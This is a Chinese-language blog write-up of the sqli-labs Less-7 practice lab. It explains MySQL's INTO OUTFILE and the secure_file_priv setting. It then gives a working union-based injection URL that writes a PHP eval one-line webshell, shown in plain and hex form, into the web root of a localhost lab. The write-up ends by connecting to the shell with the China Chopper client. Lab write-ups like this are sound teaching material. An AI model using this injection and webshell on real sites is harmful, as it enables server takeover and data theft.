SQL注入漏洞解析--less-7

我们先看一下第七关

页面显示use outfile意思是利用文件上传来做

outfile是将检索到的数据,保存到服务器的文件内:

格式:select * into outfile "文件地址"

示例:

mysql> select * into outfile 'f:/mysql/test/one' from teacher_class;

secure_file_priv参数用于限制LOAD DATA, SELECT ...OUTFILE,

LOAD_FILE()传到哪个指定目录。secure_file_priv 为 'NULL' 时,表示限制mysqld不允许导入或导出。

secure_file_priv 为 '/tmp' 时,表示限制mysqld只能在/tmp目录中执行导入导出;

secure_file_priv '没有值'时,表示不限制mysqld在任意目录的导入导出

修改之后重启mysql,再查看一下,就是空值

当输入'时报错

通过url上传一句话木马,用webshell连接工具连接(这里我用的是中国菜刀)

1.123就是连接密码

php 复制代码
<?php @eval($_POST['123']);?>

2.3c3f70687020406576616c28245f504f53545b27313233275d293b3f3e是上边一句话木马的hex编码,into outfile指定在七关目录(目录写自己的)下创建2.php文件,文件内容就是刚上传的一句话木马

  1. 登录mysql查询secure_file_priv是否为空
  2. show global variables like 'secure%'; #查询secure_file_priv
  3. 当 secure_file_priv 的值为 NULL ,表示限制 mysqld 不允许导入|导出
  4. 当 secure_file_priv 的值为 /tmp/ ,表示限制 mysqld 的导入|导出只能发生在 /tmp/目录下
  5. 当 secure_file_priv 的值没有具体值时,表示不对 mysqld 的导入|导出做限制
  6. http://127.0.0.1/sqli-labs-php7-master/Less-7/index.php?id=-1')) union select 1,0x3c3f70687020406576616c28245f504f53545b27313233275d293b3f3e,3 into outfile 'D:\phpstudy_x64_8.1.1.3\phpstudy_pro\WWW\sqli-labs-php7-master\Less-7\2.php'--+

3.用中国菜刀进行连接,测试连接成功

4.然后就可以访问数据库,从而获得信息

这道题其实出的挺鸡肋,你必须满足三个条件才能拿到他的数据库,第一就是必须拿到root权限;第二个就是 secure_file_priv这个必须不是NULL,这道题我这里是自己手动修改了,试想一下,如果你能修改权限了,还看不到里边的信息吗,或者你拿到root权限都不一定能修改的;第三个就是网站物理路径,这个想想办法还是有可能弄到。所以说这道题的条件还是很苛刻

相关推荐
Ljw...7 分钟前
DeepSeek+Kimi生成高质量PPT
数据库·c++·powerpoint·ppt·deepseek
m0_7482405413 分钟前
数据库操作与数据管理——Rust 与 SQLite 的集成
数据库·rust·sqlite
Dawndddddd14 分钟前
网络安全之攻防笔记--通用安全漏洞SQL注入&sqlmap&Oracle&mongodb&DB2
笔记·sql·安全·web安全
生产队队长15 分钟前
ThinkPHP:配置Redis并使用
android·数据库·redis
致奋斗的我们29 分钟前
HAProxy介绍与编译安装
linux·汇编·数据库·mysql·青少年编程·haproxy·openeurler
偏右右44 分钟前
UNION 联合查询
数据库·sql
Mr-Apple1 小时前
MySQL的Union和OR查询
android·数据库·mysql
YGGP2 小时前
【每日八股】Redis篇(二):数据结构
数据结构·数据库·redis
愉悦的麻婆豆腐2 小时前
Neo4j使用neo4j-admin导入csv数据方法
数据库·neo4j
夜泉_ly5 小时前
MySQL -安装与初识
数据库·mysql